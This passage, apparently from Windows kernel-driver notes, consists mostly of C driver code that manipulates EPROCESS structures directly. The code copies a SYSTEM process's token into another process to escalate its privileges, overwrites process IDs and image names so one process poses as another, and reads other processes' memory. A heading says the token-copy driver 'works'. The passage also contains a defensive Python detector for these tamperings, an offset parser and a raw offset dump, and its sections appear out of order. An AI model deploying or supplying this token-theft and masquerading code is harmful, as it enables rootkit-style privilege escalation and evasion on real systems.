        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // Copy the Token - warning: this is a high-risk operation!
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // Verify the modification
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to modify the process ID - an extremely dangerous operation that will almost certainly crash the system
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // Record the original PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // Severe warnings
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to %d(PID_NEW)", PID_NEW);
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // Modify the PID - this is a fatal operation
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // Verify the modification - the system may already have crashed before this point
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to copy the source process's Token to the target process and change the target's process ID to PID_NEW
VOID TrySystemImpersonation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // Look up the process whose PID is PID_NEW
    status = PsLookupProcessByProcessId((HANDLE)PID_NEW, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find NEW process (PID %d), status: 0x%X", PID_NEW, status);
        return;
    }

    // Look up the target process by PID
    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID_OLD, status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // Print the initial information
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // Step 1: attempt to copy the Token
    DebugMessage("qi:Step 1: Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after token modification:");
        PrintProcessInfo(targetProcess);

        // Step 2: attempt to modify the process ID - extremely dangerous
        DebugMessage("qi:Step 2: Attempting to modify target process ID to %d (PID_NEW) - EXTREMELY DANGEROUS", PID_NEW);
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)PID_NEW);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // Release the process object references
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // Attempt to elevate the process's privileges and modify its PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}
```

## 4. Copying a process Token to another process and changing its process ID and process name (works)

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__)

// EPROCESS structure offset definitions
#define EPROCESS_PID_OFFSET 0x440        // Offset of the UniqueProcessId field
#define EPROCESS_TOKEN_OFFSET 0x4b8      // Offset of the Token field
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // Offset of the ImageFileName field
#define PID_OLD 8316                     // Target process PID
#define PID_NEW 10128                    // New PID

// Driver unload function (a DriverUnload routine returns VOID)
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Print the key information of a process
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // Get the process ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // Get the process name
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // Get the Token address
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// Copy one process's Token to another process
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // Get the source process's Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // Get the target process's original Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // Copy the Token - warning: this is a high-risk operation!
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // Verify the modification
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Copy one process's name to another process
NTSTATUS CopyProcessName(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // Read the source process's name
        UCHAR sourceImageName[16] = { 0 };
        RtlCopyMemory(sourceImageName, sourceBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:Source Process Name: %s", sourceImageName);

        // Record the target process's original name
        UCHAR originalTargetName[16] = { 0 };
        RtlCopyMemory(originalTargetName, targetBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:Original Target Process Name: %s", originalTargetName);

        // Copy the process name
        RtlCopyMemory(targetBase + EPROCESS_IMAGE_NAME_OFFSET, sourceImageName, 15);

        // Verify the modification
        UCHAR newTargetName[16] = { 0 };
        RtlCopyMemory(newTargetName, targetBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:New Target Process Name: %s", newTargetName);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying process name: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to modify the process ID - an extremely dangerous operation that will almost certainly crash the system
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // Record the original PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // Severe warnings
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to %d(PID_NEW)", PID_NEW);
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // Modify the PID - this is a fatal operation
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // Verify the modification - the system may already have crashed before this point
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to copy the source process's name and Token to the target process, then change the target's process ID to PID_NEW
VOID TrySystemImpersonation()
{
    PEPROCESS sourceProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // Look up the process whose PID is PID_NEW
    status = PsLookupProcessByProcessId((HANDLE)PID_NEW, &sourceProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find NEW process (PID %d), status: 0x%X", PID_NEW, status);
        return;
    }

    // Look up the target process
    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID_OLD, status);
        ObDereferenceObject(sourceProcess);
        return;
    }

    // Print the initial information
    DebugMessage("qi:Source process info:");
    PrintProcessInfo(sourceProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // Step 1: copy the process name
    DebugMessage("qi:Step 1: Attempting to copy process name...");
    status = CopyProcessName(sourceProcess, targetProcess);
    if (!NT_SUCCESS(status)) {
        DebugMessage("qi:Process name copy failed with status: 0x%X", status);
        ObDereferenceObject(sourceProcess);
        ObDereferenceObject(targetProcess);
        return;
    }

    // Step 2: copy the Token
    DebugMessage("qi:Step 2: Attempting to copy token...");
    status = CopyProcessToken(sourceProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after modifications:");
        PrintProcessInfo(targetProcess);

        // Step 3: modify the process ID - extremely dangerous
        DebugMessage("qi:Step 3: Attempting to modify target process ID to %d - EXTREMELY DANGEROUS", PID_NEW);
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)PID_NEW);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // Release the process object references
    ObDereferenceObject(sourceProcess);
    ObDereferenceObject(targetProcess);
}

// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // Attempt to elevate the process's privileges and modify its PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}
```

## 1. Printing process information from EPROCESS

```c
#include <ntifs.h>

VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    // Narrow format string: DbgPrintEx takes a char* format, not a wide L"" literal
    DbgPrintEx(0, 0, "Unload Success!!\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    UNREFERENCED_PARAMETER(pRegPath);
    pDriverObject->DriverUnload = DriverUnload;
    PEPROCESS pEprocess = NULL;
    PEPROCESS pFirstEprocess = NULL;
    PUCHAR uIProcessName = NULL;
    LONG64 uIProcessID = 0;

    pEprocess = PsGetCurrentProcess();
    if (pEprocess == NULL)
    {
        DbgPrintEx(0, 0, "PsGetCurrentProcess Failed!\n");
        return STATUS_SUCCESS;
    }
    pFirstEprocess = pEprocess;
    while (pEprocess != NULL)
    {
        // Offsets for this build (see the dt nt!_EPROCESS output):
        // ActiveProcessLinks = 0x448
        // ImageFileName      = 0x5a8
        // UniqueProcessId    = 0x440
        uIProcessName = (PUCHAR)pEprocess + 0x5a8;
        uIProcessID = *(LONG64*)((ULONG64)pEprocess + 0x440);
        DbgPrintEx(0, 0, "Process Name = %s | Process ID = %lld\n", uIProcessName, uIProcessID);
        // Flink points at the next process's ActiveProcessLinks; subtract the field offset to get its EPROCESS base
        pEprocess = (PEPROCESS)(*(ULONG64*)((ULONG64)pEprocess + 0x448) - 0x448);

        // Stop once the circular list wraps back to the starting process, or on an invalid PID
        if (pEprocess == pFirstEprocess || uIProcessID <= 0)
        {
            break;
        }
    }
    DbgPrintEx(0, 0, "Driver Load Success!\n");
    return STATUS_SUCCESS;
}
```
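Each modification on this page leaves a cross-view inconsistency a defender can look for: CopyProcessToken makes two EPROCESS entries reference one TOKEN object, ModifyProcessId produces a UniqueProcessId that no longer matches the PID the PID table maps to that EPROCESS (or a duplicate PID such as 4), CopyProcessName leaves ImageFileName disagreeing with the image path, and unlinking (section 5) removes an entry from the ActiveProcessLinks walk above while the PID table still knows it. The following is an added example, not the page's driver code: a Python checker over per-process records constructed to mirror those fields, with the list walk and the PID-table mapping as assumed inputs.

```python
"""Cross-view checks for the EPROCESS tampering shown on this page.

Added example, not the page's driver code. Every record mirrors the fields the
drivers above read or overwrite. Two views are assumed as inputs: LIST_VIEW is
what a walk of ActiveProcessLinks yields (the loop in the driver above), and
PID_TABLE is the PID -> EPROCESS mapping the PID table holds, i.e. what
PsLookupProcessByProcessId consults.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcRecord:
    eprocess: int     # EPROCESS address
    pid: int          # UniqueProcessId as stored in the EPROCESS
    token: int        # Token field (EX_FAST_REF: the low 4 bits hold a reference count)
    image_name: str   # ImageFileName (at most 15 characters)
    image_path: str   # full image path; empty for kernel-only processes such as System


def token_object(token_ref: int) -> int:
    """Strip the EX_FAST_REF count bits so two references to one TOKEN compare equal."""
    return token_ref & ~0xF


def find_shared_tokens(view: List[ProcRecord]) -> Dict[int, List[int]]:
    """TOKEN objects referenced by more than one EPROCESS: what CopyProcessToken leaves.
    Returns {token object: [EPROCESS addresses]}."""
    by_token: Dict[int, List[int]] = defaultdict(list)
    for r in view:
        by_token[token_object(r.token)].append(r.eprocess)
    return {tok: addrs for tok, addrs in by_token.items() if len(addrs) > 1}


def find_duplicate_pids(view: List[ProcRecord]) -> Dict[int, List[int]]:
    """Two EPROCESS entries carrying the same UniqueProcessId, e.g. after ModifyProcessId(..., 4)."""
    by_pid: Dict[int, List[int]] = defaultdict(list)
    for r in view:
        by_pid[r.pid].append(r.eprocess)
    return {pid: addrs for pid, addrs in by_pid.items() if len(addrs) > 1}


def find_name_mismatches(view: List[ProcRecord]) -> List[int]:
    """ImageFileName disagreeing with the basename of the image path: CopyProcessName
    overwrites only the 15-byte name, not the path the process was created from."""
    bad = []
    for r in view:
        if not r.image_path:          # System, Idle and similar have no path to compare
            continue
        basename = r.image_path.rsplit("\\", 1)[-1]
        if basename.lower()[:15] != r.image_name.lower():
            bad.append(r.eprocess)
    return bad


def find_pid_table_divergence(list_view: List[ProcRecord],
                              pid_table: Dict[int, int]) -> Tuple[List[int], List[int]]:
    """Compare the list walk with the PID table.
    unlinked:  EPROCESS reachable via the PID table but missing from ActiveProcessLinks.
    rewritten: EPROCESS whose stored PID differs from the PID the table maps to it
               (the UniqueProcessId field was overwritten after creation)."""
    listed = {r.eprocess for r in list_view}
    unlinked = [addr for addr in pid_table.values() if addr not in listed]
    addr_to_table_pid = {addr: pid for pid, addr in pid_table.items()}
    rewritten = [r.eprocess for r in list_view
                 if r.eprocess in addr_to_table_pid and addr_to_table_pid[r.eprocess] != r.pid]
    return unlinked, rewritten


# Constructed sample (not real dump data): System, a benign svchost, a notepad.exe whose
# token, name and PID were overwritten as in section 4 above, and one unlinked process.
SYSTEM = 0xFFFF800000001000
SVCHOST = 0xFFFF800000002000
NOTEPAD = 0xFFFF800000003000
HIDDEN = 0xFFFF800000004000
LIST_VIEW = [
    ProcRecord(SYSTEM, 4, 0xFFFFA00000001007, "System", ""),
    ProcRecord(SVCHOST, 900, 0xFFFFA0000000200A, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    # Token copied from System (different count bits), name copied from svchost, PID set to 4
    ProcRecord(NOTEPAD, 4, 0xFFFFA00000001003, "svchost.exe", r"C:\Windows\System32\notepad.exe"),
]
PID_TABLE = {4: SYSTEM, 900: SVCHOST, 8316: NOTEPAD, 10128: HIDDEN}   # 10128 was unlinked from the list


def run_checks(list_view=LIST_VIEW, pid_table=PID_TABLE) -> dict:
    unlinked, rewritten = find_pid_table_divergence(list_view, pid_table)
    return {
        "shared_tokens": find_shared_tokens(list_view),
        "duplicate_pids": find_duplicate_pids(list_view),
        "name_mismatches": find_name_mismatches(list_view),
        "unlinked": unlinked,
        "rewritten_pids": rewritten,
    }


if __name__ == "__main__":
    for check, hits in run_checks().items():
        print(f"{check}: {hits if hits else 'none'}")
```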

## Reading a process's virtual memory after locating its EPROCESS by process name

```c
#include <ntifs.h>
#include <stdio.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__)

// Function declarations
NTSTATUS ReadSystemVirtualMemory(PVOID virtualAddr, PVOID buffer, SIZE_T size);
NTSTATUS ReadProcessMemory(PEPROCESS Process, PVOID userAddr, PVOID buffer, SIZE_T size);
void PrintBuffer(PVOID buffer, SIZE_T size);

// Driver unload function (a DriverUnload routine returns VOID)
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("unload pDriverObject addr is %p\n", pDriverObject);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    UCHAR buffer[64] = { 0 };
    NTSTATUS status;

    pDriverObject->DriverUnload = UnloadDriver;
    DebugMessage("Into DriverEntry %p\n", pDriverObject);
    DebugMessage("pDriverObject address is %p\n", pDriverObject);
    DebugMessage("pRegistryPath is %wZ\n", pRegistryPath);

    // System virtual address to read
    PVOID systemVirtualAddr = (PVOID)0xFFFFB68807741D30;

    // Call the standalone function to read system virtual memory
    status = ReadSystemVirtualMemory(systemVirtualAddr, buffer, sizeof(buffer));

    if (NT_SUCCESS(status)) {
        DebugMessage("Successfully read system virtual memory\n");
    }
    else {
        DebugMessage("Failed to read system virtual memory, status: 0x%X\n", status);
    }

    // Example of reading process memory
    // 1. Find the target process (notepad.exe as the example)
    PEPROCESS targetProcess = NULL;
    ULONG pid = 0;

    // Search for the process's PID
    for (pid = 4; pid < 100000; pid += 4) {
        status = PsLookupProcessByProcessId((HANDLE)pid, &targetProcess);
        if (NT_SUCCESS(status)) {
            // Check whether this is the target process by reading its name
            PUCHAR procNamePtr = (PUCHAR)targetProcess + 0x5A8; // ImageFileName offset in the Windows 11 EPROCESS; may need adjusting for the system version
            char imageName[16] = { 0 };
            RtlCopyMemory(imageName, procNamePtr, 15);

            if (_stricmp(imageName, "notepad.exe") == 0) {
                DebugMessage("Found notepad.exe process, PID: %d\n", pid);

                // Read process memory (0x00007FF7FE3C0000 is a sample address; replace it with the real one)
                PVOID userVirtualAddr = (PVOID)0x00007FF7FE3C0000;
                RtlZeroMemory(buffer, sizeof(buffer));

                status = ReadProcessMemory(targetProcess, userVirtualAddr, buffer, sizeof(buffer));

                if (NT_SUCCESS(status)) {
                    DebugMessage("Successfully read process memory\n");
                    PrintBuffer(buffer, sizeof(buffer));
                }
                else {
                    DebugMessage("Failed to read process memory, status: 0x%X\n", status);
                }

                // Remember to release the process object reference
                ObDereferenceObject(targetProcess);
                break;
            }

            // Not the target process; release the reference
            ObDereferenceObject(targetProcess);
        }
    }

    if (pid >= 100000) {
        DebugMessage("Could not find notepad.exe process\n");
    }

    return STATUS_SUCCESS;
}

// Standalone function for reading system virtual memory
NTSTATUS ReadSystemVirtualMemory(PVOID virtualAddr, PVOID buffer, SIZE_T size)
{
    NTSTATUS status = STATUS_SUCCESS;

    // Protect the memory access with a try-except block
    __try {
        // Read the data into the buffer directly through the pointer
        RtlCopyMemory(buffer, virtualAddr, size);
        DebugMessage("System virtual memory at 0x%p:", virtualAddr);
        PrintBuffer(buffer, size);
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        status = GetExceptionCode();
        DebugMessage("Exception occurred while accessing memory: 0x%X\n", status);
    }
    return status;
}

// Function for reading a process's virtual memory
NTSTATUS ReadProcessMemory(PEPROCESS Process, PVOID userAddr, PVOID buffer, SIZE_T size)
{
    NTSTATUS status = STATUS_SUCCESS;
    KAPC_STATE apcState;

    // Attach to the target process's address space
    KeStackAttachProcess(Process, &apcState);

    // Attempt to read the memory
    __try {
        // Check that the address is valid
        if (MmIsAddressValid(userAddr)) {
            ProbeForRead(userAddr, size, 1);
            RtlCopyMemory(buffer, userAddr, size);
            DebugMessage("Process virtual memory at 0x%p:", userAddr);
        }
        else {
            status = STATUS_INVALID_ADDRESS;
            DebugMessage("Invalid address: 0x%p\n", userAddr);
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        status = GetExceptionCode();
        DebugMessage("Exception occurred while accessing process memory: 0x%X\n", status);
    }

    // Detach from the process
    KeUnstackDetachProcess(&apcState);

    return status;
}

// Hex-dump a buffer, 16 bytes per line
void PrintBuffer(PVOID buffer, SIZE_T size)
{
    PUCHAR byteBuffer = (PUCHAR)buffer;

    char lineBuf[100];
    int linePos = 0;

    for (SIZE_T i = 0; i < size; i++) {
        if (i % 16 == 0) {
            if (i > 0) {
                DebugMessage("%s", lineBuf);
            }
            linePos = 0;
            linePos += sprintf_s(lineBuf, sizeof(lineBuf), "%04X: ", (UINT32)i);
        }
        linePos += sprintf_s(lineBuf + linePos, sizeof(lineBuf) - linePos, "%02X ", byteBuffer[i]);
    }
    if (linePos > 0) {
        DebugMessage("%s", lineBuf);
    }
}
```
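The drivers above hardcode 0x440, 0x4b8 and 0x5a8, and the comment at the lookup loop notes that the ImageFileName offset may need adjusting per build. As an added example (not the page's code), here is a Python parser for the `dt nt!_EPROCESS` output shown on this page: it extracts member offsets, reports bitfield members (`Pos n, m Bit(s)`) with their position and width, and emits `#define` lines in the style of the drivers' offset macros, so offsets come from the target build's symbols rather than a constant; the sample dump is constructed from the lines reproduced on this page.

```python
"""Parse WinDbg ``dt nt!_EPROCESS`` output into member offsets.

Added example, not the page's code. SAMPLE_DT is constructed from lines of the
22H2 dump reproduced on this page plus the Token and ImageFileName members at
the offsets the drivers above use; feed the parser a full dump to get every
member. Bitfield members share the offset of their containing integer and are
reported with their bit position and width.
"""
import re
from typing import Dict, Iterable, NamedTuple, Optional

# "+0x440 UniqueProcessId : Ptr64 Void"
MEMBER_RE = re.compile(r"^\s*\+0x([0-9a-fA-F]+)\s+(\w+)\s*:\s*(.+?)\s*$")
# "Pos 12, 3 Bits"
BITFIELD_RE = re.compile(r"^Pos\s+(\d+),\s+(\d+)\s+Bits?$")


class Member(NamedTuple):
    offset: int
    type_text: str
    bit_pos: Optional[int]     # None for ordinary members
    bit_width: Optional[int]


def parse_dt_output(text: str) -> Dict[str, Member]:
    """Return {member name: Member} for every '+0x... Name : Type' line.
    Lines that are not members (the 'kd>' prompt, blank lines) are skipped."""
    members: Dict[str, Member] = {}
    for line in text.splitlines():
        m = MEMBER_RE.match(line)
        if not m:
            continue
        offset, name, type_text = int(m.group(1), 16), m.group(2), m.group(3)
        bf = BITFIELD_RE.match(type_text)
        if bf:
            members[name] = Member(offset, type_text, int(bf.group(1)), int(bf.group(2)))
        else:
            members[name] = Member(offset, type_text, None, None)
    return members


def required_offsets(members: Dict[str, Member], names: Iterable[str]) -> Dict[str, int]:
    """Offsets for the members a driver needs; a missing member is an error rather
    than a silently reused constant from another build."""
    names = list(names)
    missing = [n for n in names if n not in members]
    if missing:
        raise KeyError(f"members not present in this build's _EPROCESS: {missing}")
    return {n: members[n].offset for n in names}


def render_c_defines(offsets: Dict[str, int]) -> str:
    """Emit '#define EPROCESS_<NAME>_OFFSET 0x...' lines, one per member."""
    lines = []
    for name, off in offsets.items():
        macro = re.sub(r"(?<!^)(?=[A-Z])", "_", name).upper()   # UniqueProcessId -> UNIQUE_PROCESS_ID
        lines.append(f"#define EPROCESS_{macro}_OFFSET 0x{off:x}")
    return "\n".join(lines)


# Constructed sample: a subset of the dump shown on this page
SAMPLE_DT = """\
0: kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x438 ProcessLock      : _EX_PUSH_LOCK
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   +0x460 Flags2           : Uint4B
   +0x460 JobNotReallyActive : Pos 0, 1 Bit
   +0x460 DefaultPagePriority : Pos 12, 3 Bits
   +0x460 PrimaryTokenFrozen : Pos 15, 1 Bit
   +0x4b8 Token            : _EX_FAST_REF
   +0x5a8 ImageFileName    : [15] UChar
"""

if __name__ == "__main__":
    members = parse_dt_output(SAMPLE_DT)
    offs = required_offsets(members, ["UniqueProcessId", "ActiveProcessLinks", "Token", "ImageFileName"])
    print(render_c_defines(offs))
```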

# Website for looking up EPROCESS offsets on different systems

## Windows 10 22H2 EPROCESS structure offsets

0: kd> dt nt!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x438 ProcessLock : _EX_PUSH_LOCK
+0x440 UniqueProcessId : Ptr64 Void
+0x448 ActiveProcessLinks : _LIST_ENTRY
+0x458 RundownProtect : _EX_RUNDOWN_REF
+0x460 Flags2 : Uint4B
+0x460 JobNotReallyActive : Pos 0, 1 Bit
+0x460 AccountingFolded : Pos 1, 1 Bit
+0x460 NewProcessReported : Pos 2, 1 Bit
+0x460 ExitProcessReported : Pos 3, 1 Bit
+0x460 ReportCommitChanges : Pos 4, 1 Bit
+0x460 LastReportMemory : Pos 5, 1 Bit
+0x460 ForceWakeCharge : Pos 6, 1 Bit
+0x460 CrossSessionCreate : Pos 7, 1 Bit
+0x460 NeedsHandleRundown : Pos 8, 1 Bit
+0x460 RefTraceEnabled : Pos 9, 1 Bit
+0x460 PicoCreated : Pos 10, 1 Bit
+0x460 EmptyJobEvaluated : Pos 11, 1 Bit
+0x460 DefaultPagePriority : Pos 12, 3 Bits
+0x460 PrimaryTokenFrozen : Pos 15, 1 Bit
+0x460 ProcessVerifierTarget : Pos 16, 1 Bit
+0x460 RestrictSetThreadContext : Pos 17, 1 Bit
+0x460 AffinityPermanent : Pos 18, 1 Bit
+0x460 AffinityUpdateEnable : Pos 19, 1 Bit
+0x460 PropagateNode : Pos 20, 1 Bit
+0x460 ExplicitAffinity : Pos 21, 1 Bit
+0x460 ProcessExecutionState : Pos 22, 2 Bits
+0x460 EnableReadVmLogging : Pos 24, 1 Bit
+0x460 EnableWriteVmLogging : Pos 25, 1 Bit
+0x460 FatalAccessTerminationRequested : Pos 26, 1 Bit
+0x460 DisableSystemAllowedCpuSet : Pos 27, 1 Bit
+0x460 ProcessStateChangeRequest : Pos 28, 2 Bits
+0x460 ProcessStateChangeInProgress : Pos 30, 1 Bit
+0x460 InPrivate : Pos 31, 1 Bit
+0x464 Flags : Uint4B
+0x464 CreateReported : Pos 0, 1 Bit
+0x464 NoDebugInherit : Pos 1, 1 Bit
+0x464 ProcessExiting : Pos 2, 1 Bit
+0x464 ProcessDelete : Pos 3, 1 Bit
+0x464 ManageExecutableMemoryWrites : Pos 4, 1 Bit
+0x464 VmDeleted : Pos 5, 1 Bit
+0x464 OutswapEnabled : Pos 6, 1 Bit
+0x464 Outswapped : Pos 7, 1 Bit
+0x464 FailFastOnCommitFail : Pos 8, 1 Bit
+0x464 Wow64VaSpace4Gb : Pos 9, 1 Bit
+0x464 AddressSpaceInitialized : Pos 10, 2 Bits
+0x464 SetTimerResolution : Pos 12, 1 Bit
+0x464 BreakOnTermination : Pos 13, 1 Bit
+0x464 DeprioritizeViews : Pos 14, 1 Bit
+0x464 WriteWatch : Pos 15, 1 Bit
+0x464 ProcessInSession : Pos 16, 1 Bit
+0x464 OverrideAddressSpace : Pos 17, 1 Bit
+0x464 HasAddressSpace : Pos 18, 1 Bit
+0x464 LaunchPrefetched : Pos 19, 1 Bit
+0x464 Background : Pos 20, 1 Bit
+0x464 VmTopDown : Pos 21, 1 Bit
+0x464 ImageNotifyDone : Pos 22, 1 Bit
+0x464 PdeUpdateNeeded : Pos 23, 1 Bit
+0x464 VdmAllowed : Pos 24, 1 Bit
+0x464 ProcessRundown : Pos 25, 1 Bit
+0x464 ProcessInserted : Pos 26, 1 Bit
+0x464 DefaultIoPriority : Pos 27, 3 Bits
